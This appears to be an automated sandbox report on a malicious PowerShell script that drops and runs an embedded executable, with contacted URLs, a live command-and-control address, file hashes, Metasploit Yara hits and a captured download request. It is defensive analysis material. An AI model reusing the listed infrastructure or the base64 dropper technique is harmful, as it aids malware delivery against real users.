      http://3.17.10.250/EkTY100%Avira URL Cloudmalware
      http://3.17.10.250/EkTYs0%Avira URL Cloudsafe

      Download Network PCAP: filteredfull

      No contacted domains info
      NameMaliciousAntivirus DetectionReputation
      http://.17.10.250:80/EkTYtrue
      • Avira URL Cloud: safe
      unknown
      http://3.17.10.250/EkTYtrue
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1702047883.0000026422F7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.000002643146D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://contoso.com/powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1702047883.0000026422F7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.000002643146D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/Licensepowershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Iconpowershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://oneget.orgXpowershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://upx.sf.netAmcache.hve.5.drfalse
                          high
                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.1702047883.00000264213F1000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://3.17.10.250/EkTYstmpE651.exe, 00000002.00000002.1877232038.00000000000AB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1702047883.00000264213F1000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://oneget.orgpowershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  3.17.10.250
                                  unknownUnited States
                                  16509AMAZON-02UStrue
                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1602897
                                  Start date and time:2025-01-30 10:26:07 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 4m 33s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:10
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:fabd6ab15a0540d197f1ceaa312308b8.ps1
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winPS1@5/11@0/1
                                  EGA Information:
                                  • Successful, ratio: 50%
                                  HCA Information:
                                  • Successful, ratio: 88%
                                  • Number of executed functions: 12
                                  • Number of non-executed functions: 15
                                  Cookbook Comments:
                                  • Found application associated with file extension: .ps1
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 52.165.164.15, 52.168.117.173, 40.69.42.241, 40.126.31.71, 13.107.246.45
                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                  • Execution Graph export aborted for target powershell.exe, PID 4312 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  TimeTypeDescription
                                  04:27:00API Interceptor8x Sleep call for process: powershell.exe modified
                                  04:27:02API Interceptor37x Sleep call for process: tmpE651.exe modified
                                  04:27:18API Interceptor1x Sleep call for process: WerFault.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3.17.10.2501.vbsGet hashmaliciousCobaltStrike, MetasploitBrowse
                                  • 3.17.10.250/EkTY
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  AMAZON-02US1.vbsGet hashmaliciousCobaltStrike, MetasploitBrowse
                                  • 3.17.10.250
                                  m68k.elfGet hashmaliciousMiraiBrowse
                                  • 54.171.230.55
                                  SOA OF DEC 2024 PT.BINEX.exeGet hashmaliciousFormBookBrowse
                                  • 13.248.169.48
                                  https://l.ead.me/bfibh8/?1778990567JHGFBVDFS56678Get hashmaliciousHTMLPhisherBrowse
                                  • 3.161.119.33
                                  SERVED SUMMON LETTER 01-30-2025.pdfGet hashmaliciousHTMLPhisherBrowse
                                  • 13.248.243.5
                                  contract update.exeGet hashmaliciousFormBookBrowse
                                  • 13.248.169.48
                                  Updated 2025 Trading Agreement for Direct Purchase account.exeGet hashmaliciousFormBookBrowse
                                  • 13.248.169.48
                                  Bank Slip pdf.exeGet hashmaliciousFormBookBrowse
                                  • 13.248.169.48
                                  SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                  • 13.248.169.48
                                  http://ndex-log.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                  • 18.244.20.134
                                  No context
                                  No context
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.8811825035728077
                                  Encrypted:false
                                  SSDEEP:96:wnFHOtkeLGQszhMoh7JfoQXIDcQWc6zcEZcw37/+HbHg/5jgOg0dl/phsv5o1OyG:mNOtkeLGQ80I3D8jZRzuiFkZ24lO8t
                                  MD5:07EFE9A0B055EF658510955DF9486E72
                                  SHA1:359C898DDC85BE8FEB87ECA7C357C0A80285E39A
                                  SHA-256:E288C16CAE9A78BE0FBB7DD9CD403B0BF2AF78F7835696FBFBDCA6D6D5F33E40
                                  SHA-512:C81C92C285C26BF50E1593DF0B38FEE59251D3E53373CB5BEC2D2CE04045DAEBC0DA5AD59C10E9F5F2C0DAA7BE90820747951DD86F31AD5BFDBEB104B12D159E
                                  Malicious:false
                                  Reputation:low
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.2.7.0.2.8.2.6.8.7.3.1.7.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.2.7.0.2.8.2.7.2.6.3.8.0.2.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.4.b.5.3.0.6.-.7.c.b.a.-.4.0.7.2.-.9.f.2.7.-.f.c.b.7.2.4.b.e.1.b.3.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.4.0.9.c.6.b.-.5.e.0.7.-.4.7.a.4.-.9.f.3.f.-.6.c.1.9.b.5.5.1.9.d.3.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.t.m.p.E.6.5.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.0.8.-.0.0.0.1.-.0.0.1.4.-.a.5.5.9.-.e.c.1.d.f.9.7.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.f.6.4.5.9.c.d.4.9.9.d.5.7.e.8.5.4.8.5.9.b.2.0.e.e.d.6.2.2.9.a.0.0.0.0.f.f.f.f.!.0.0.0.0.4.6.a.7.2.2.d.0.e.b.5.1.0.4.d.b.f.7.6.6.1.0.f.d.9.7.0.a.3.a.a.4.b.8.0.7.8.4.0.2.!.t.m.p.E.6.5.1...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.:.0.0.
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Thu Jan 30 09:27:07 2025, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):147264
                                  Entropy (8bit):1.3241916327819871
                                  Encrypted:false
                                  SSDEEP:384:/TAJHwc3biBq2aOS5iFdYVU/GQdQxwlQZNFAd0W2A4oKaK:/TWHw2bCq2tEeAU+QdQxwlQZNFAd0WzU
                                  MD5:F699959380276DEB7E91C307B12360DE
                                  SHA1:B310FCBC00AD892E7BB310AE09CDCBCD6F276F45
                                  SHA-256:2C7D45305D0023B82BE4A8D9E52AA30CFFE6E8984FEEF0EC957A271C8BBB7CA5
                                  SHA-512:D1FDB594AF7B60853D0756CEB48F55757C8CE48131ECE694275060CBC6DC056374903EB630CA5CCFE41779D38E03401AB5DC927C41E43AC2080150D94B2D20B5
                                  Malicious:false
                                  Yara Hits:
                                  • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, Author: unknown
                                  • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, Author: unknown
                                  Reputation:low
                                  Preview:MDMP..a..... ........E.g........................x...........d...bZ..........T.......8...........T............+..p.......................................................................................................eJ..............Lw......................T............E.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8702
                                  Entropy (8bit):3.698897322204178
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJw+416YGZS7gmfEwpDt89bVeb10flPejm:R6lXJho6YQS7gmfEXVebGf9e6
                                  MD5:0A365DA0408F98054D95C81339B010D6
                                  SHA1:92E97E363E7DDC913B8DF4005D1637B661780CC4
                                  SHA-256:C817CB92D39050ACDB31521C75F357EB697B7E62331A7C131D0812A3675010B2
                                  SHA-512:AD758F45A5615FA80BD7BDDA3E6038201457CB7727FFC3C835CA3B0B08E48EC6AFDB952E52DF3457ED0C81F7DE6AA8205D3D1CAE2CFAECF190D11A717969F73A
                                  Malicious:false
                                  Reputation:low
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.8.4.8.<./.P.i.
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4669
                                  Entropy (8bit):4.46160046145322
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zseJg771I9dkFWpW8VYBPYm8M4JpeOKFnyq85EzOGHV3Fad:uIjfUI7907V4SJorNpV3Fad
                                  MD5:4184B04D2DCC09EC970AFA6E6186F0A5
                                  SHA1:A21E5F89E1E9134612B7B042FAC4B2A4884A22FF
                                  SHA-256:40091C68DCC186EF2820A4E7ADED33A6DCBD5D433B0AD2984B9AA8FC0DDF4828
                                  SHA-512:892ED0D4B0099BD0217A8AB81EAACC3FF951CDB027CA768025F99F6FA9C3B93805D090011FC6C62E06DF539286EC389D1853AB2BE07486972C0AA52E411667DB
                                  Malicious:false
                                  Reputation:low
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="698429" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):1.1940658735648508
                                  Encrypted:false
                                  SSDEEP:3:Nlllulbnolz:NllUc
                                  MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                  SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                  SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                  SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:@...e................................................@..........
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):19456
                                  Entropy (8bit):5.223845919613859
                                  Encrypted:false
                                  SSDEEP:192:jV7qaCF6Op1t2dobVXujRDcBaXWQjwOT/2L3QzWF8qa1Dojjgi:NqaCF31cix+Dc4zjCFF46gi
                                  MD5:A7E64FEA00D97B963D90E53093D5E220
                                  SHA1:46A722D0EB5104DBF76610FD970A3AA4B8078402
                                  SHA-256:D1EC863E06892A7D5D4F4A495AE43FA8476841A6A83F618D4A5AEE0A9A550C73
                                  SHA-512:F9C10046699D915CC1A78BF302585B1CAF4191FC3BC6DEBF6FBBD9FDE98AE07B82B04233536A022749463DFC83D57C2F31D31CB4ECD366B9E8295491966046E6
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 87%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."...H................@............................................... ..............................................................`..............................................`P..(...................$................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......P.......,..............@.`@.pdata.......`.......6..............@.0@.xdata..8....p.......:..............@.0@.bss..................................`..idata...............>..............@.0..CRT....h............H..............@.@..tls.................J..............@.@.........................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7316487284588975
                                  Encrypted:false
                                  SSDEEP:48:8U0OXJfLPr3C4U282jZbukvhkvklCywKmdgY2TVlCw7SogZoFAY2TVlCw7SogZoX:Xdf33CxH2okvhkvCCtn2TV6Ho2TV6Hq
                                  MD5:E2E0FF5AAEEACD9404BD8A2C5AA00363
                                  SHA1:435EC7BAA00EA78CFF02531E3AE05BAE2A1F35AA
                                  SHA-256:B724ED3808E19DBEF1CC8458FA30216A3AC416C59A15C44DE1667AAF2F1C6E9E
                                  SHA-512:876F461A1C85EFAB3219E1AC3E0F426A08713FAEF6AE4825D0F18C657F4D7E542BC5FCDF07A528A44571FDD5C3616CB50277A98703CDB45DCC10A3916AE6E639
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...-/.v....~.h..r..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....$.s..r..;.y..r......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^>Z\K...........................%..A.p.p.D.a.t.a...B.V.1.....>Z[K..Roaming.@......CW.^>Z[K..........................8Y$.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^>Z`K..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................TR..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^>Z`K....Q...........
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7316487284588975
                                  Encrypted:false
                                  SSDEEP:48:8U0OXJfLPr3C4U282jZbukvhkvklCywKmdgY2TVlCw7SogZoFAY2TVlCw7SogZoX:Xdf33CxH2okvhkvCCtn2TV6Ho2TV6Hq
                                  MD5:E2E0FF5AAEEACD9404BD8A2C5AA00363
                                  SHA1:435EC7BAA00EA78CFF02531E3AE05BAE2A1F35AA
                                  SHA-256:B724ED3808E19DBEF1CC8458FA30216A3AC416C59A15C44DE1667AAF2F1C6E9E
                                  SHA-512:876F461A1C85EFAB3219E1AC3E0F426A08713FAEF6AE4825D0F18C657F4D7E542BC5FCDF07A528A44571FDD5C3616CB50277A98703CDB45DCC10A3916AE6E639
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...-/.v....~.h..r..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....$.s..r..;.y..r......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^>Z\K...........................%..A.p.p.D.a.t.a...B.V.1.....>Z[K..Roaming.@......CW.^>Z[K..........................8Y$.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^>Z`K..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................TR..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^>Z`K....Q...........
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.465570297432728
                                  Encrypted:false
                                  SSDEEP:6144:yIXfpi67eLPU9skLmb0b4VWSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSbN:3XD94VWlLZMM6YFHd+N
                                  MD5:63F36ECD01FF2AE80C34271BCAF93BC7
                                  SHA1:8B2448ADA8BA9CD1F644D0AD2750E4EAE90CB345
                                  SHA-256:6771B7403EDE796CB273377FAC2596661556D279698CEB866D45467650E27416
                                  SHA-512:6886BF65849A96A19B7A5EBE0CB35B4473701BE5BC1676733CCEA692C3F4106F1E641A58127E66F038B621B13840513C91ABF98542710615DD21A1613F2E692A
                                  Malicious:false
                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.L>!.r...............................................................................................................................................................................................................................................................................................................................................).........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  File type:ASCII text, with very long lines (25999), with CRLF line terminators
                                  Entropy (8bit):4.5718865364812205
                                  TrID:
                                    File name:fabd6ab15a0540d197f1ceaa312308b8.ps1
                                    File size:26'998 bytes
                                    MD5:8e117177bf5213213a857e0772e0d879
                                    SHA1:34cd43115fd3afc87867b7fafed5d22efd7209fd
                                    SHA256:c22079f6740eb864daa646b8d6f6a6d038482db3830ec0dd47fa3b0893c9eb0c
                                    SHA512:004904ab2dc2f6a2d31a7c419cfc532f23bb2d7f8795481a9ebf6116f106b272c9c0b125d9532bab10d0909ce977dd8fe021295193ac0b4f3af0d08433173ac8
                                    SSDEEP:768:uY4VP0laTHZBJYqP1pnFhoooooohokgpgPR:u4y5gS5bR
                                    TLSH:E6C21AB75B4B79D82EB50EC951043C828D6CBA9BA721D084BDCC30AAB3B9954CD24DD8
                                    File Content Preview:..$arquivo_bytes = [System.Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYJAAAAAAAAAAAAAAAAAPAA
                                    Icon Hash:3270d6baae77db44

                                    Download Network PCAP: filteredfull

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 30, 2025 10:27:02.936757088 CET4973180192.168.2.43.17.10.250
                                    Jan 30, 2025 10:27:02.941823006 CET80497313.17.10.250192.168.2.4
                                    Jan 30, 2025 10:27:02.943576097 CET4973180192.168.2.43.17.10.250
                                    Jan 30, 2025 10:27:02.943770885 CET4973180192.168.2.43.17.10.250
                                    Jan 30, 2025 10:27:02.949538946 CET80497313.17.10.250192.168.2.4
                                    Jan 30, 2025 10:27:07.010061979 CET4973180192.168.2.43.17.10.250
                                    • 3.17.10.250
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.4497313.17.10.250803848C:\Users\user\AppData\Local\Temp\tmpE651.exe
                                    TimestampBytes transferredDirectionData
                                    Jan 30, 2025 10:27:02.943770885 CET165OUTGET /EkTY HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                    Host: 3.17.10.250
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache


                                    Click to jump to process

                                    050100s0.0020406080100MB

                                    Click to jump to process

                                    • File
                                    • Registry

                                    Click to dive into process behavior distribution

                                    Target ID:0
                                    Start time:04:26:58
                                    Start date:30/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    Target ID:1
                                    Start time:04:26:58
                                    Start date:30/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    Target ID:2
                                    Start time:04:27:01
                                    Start date:30/01/2025
                                    Path:C:\Users\user\AppData\Local\Temp\tmpE651.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Local\Temp\tmpE651.exe"
